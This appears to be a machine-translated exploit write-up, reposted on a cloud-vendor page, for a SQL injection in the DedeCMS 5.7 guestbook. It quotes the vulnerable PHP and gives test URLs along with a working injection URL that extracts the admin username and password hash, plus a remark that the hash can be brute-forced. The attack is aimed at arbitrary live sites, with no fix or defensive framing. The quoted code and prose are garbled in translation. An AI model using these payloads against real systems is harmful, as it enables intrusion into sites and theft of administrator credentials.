dedecms5.7 Latest SQL Exploits guestbook.php Injection Vulnerability

Source: Internet
Author: User

This article is about dedecms5.7 the latest SQL to take advantage of the guestbook.php injection vulnerability, now share to everyone, the need for friends can refer to

Affected version is 5.7

Vulnerability file edit.inc.php specific code:

< PHP if (!defined (' Dedeinc ')) exit (' Request error! ');  if (!empty ($_cookie[' Guest_book_pos '))) $GUEST _book_pos = $_cookie[' Guest_book_pos '];     else $GUEST _book_pos = "guestbook.php";  $id = Intval ($id);     if (empty ($job)) $job = ' view ';  if ($job = = ' del ' && $g _isadmin) {$dsql->executenonequery ("DELETE from ' #@__guestbook ' WHERE id= ' $id '"); ShowMsg ("successfully deleted a message!  ", $GUEST _book_pos);  Exit (); } else if ($job = = ' Check ' && $g _isadmin) {$dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ischeck=1 wher  E id= ' $id '); ShowMsg ("Successful review of a message!")  ", $GUEST _book_pos);  Exit ();  } else if ($job = = ' Editok ') {$remsg = Trim ($remsg); if ($remsg! = ") {//admin reply does not filter HTML By:errorera blog:errs.cc if ($g _isadmin) {$msg =" <p class= ' Rebox ' > ". $msg."  </p>\n ". $remsg; $remsg <br/><font color=red> admin reply:</font>} else {$row = $dsql->getone ("Select msg from ' #@__gu  Estbook ' WHERE id= ' $id ' "); $oldmsg = "<p class= ' Rebox ' >". Addslashes ($row [' msg ']). "  </p>\n ";  $remsg = Trimmsg (CN_SUBSTRR ($remsg, 1024), 1);  $msg = $oldmsg. $remsg; }}//There is no filtering on $msg, resulting in By:errorera home:www.errs.cc can be injected arbitrarily $dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ' msg ' = ' $msg ', ' posttime ' = ' ". Time ()." '  WHERE id= ' $id '); ShowMsg ("Successful change or reply to a message!  ", $GUEST _book_pos);  Exit ();  }//home:www.errs.cc if ($g _isadmin) {$row = $dsql->getone ("select * from ' #@__guestbook ' WHERE id= ' $id '"); Require_once (dedetemplate. '  /plus/guestbook-admin.htm ');  } else {$row = $dsql->getone ("Select Id,title from ' #@__guestbook ' WHERE id= ' $id '"); Require_once (dedetemplate. '  /plus/guestbook-user.htm '); }

Vulnerability success requires conditions:
1. PHP Magic_quotes_gpc=off
2. vulnerability file exists plus/guestbook.php Dede_guestbook Table of course also exists.

How to tell if there is a vulnerability:
First open www.xxx.com/plus/guestbook.php can see other people's message,
Then the mouse on the [reply/edit] can see the ID of someone else's message. Then write down the ID
Access:

www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc ' &id= existing message ID

If it is a dede5.7 version after submission, "successful change or reply to a message" will show that the modification was successful.
Jump back to www.xxx.com/plus/guestbook.php see if you change the message ID has become errs.cc '

If it turns out to be a loophole, it should open PHP Magic_quotes_gpc=off for him.

If there is no successful modification, then the content of the message ID is the previous one to prove that the vulnerability can be exploited.
Then visit again


www.xxx.com/plus/guestbook.php?action=admin&job=editok&id= existing Message id&msg= ', Msg=user (), email= '

Then return, the content of the message ID is directly modified to the MySQL user ().

Probably the use is this, we are interested in more research under!!

Finally, it is estimated that some people will say how to manage the password of the background account, you will know by yourself. Anyway, absolutely can be violent out (can not burst out I will not send)!!

View sourceprint?1/plus/guestbook.php?action=admin&job=editok&id=146&msg= ', msg=@ ', msg= (SelecT CONCAT (userid,0x7c,pwd) from '%23@__admin ' LIMIT 0,1), email= '

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.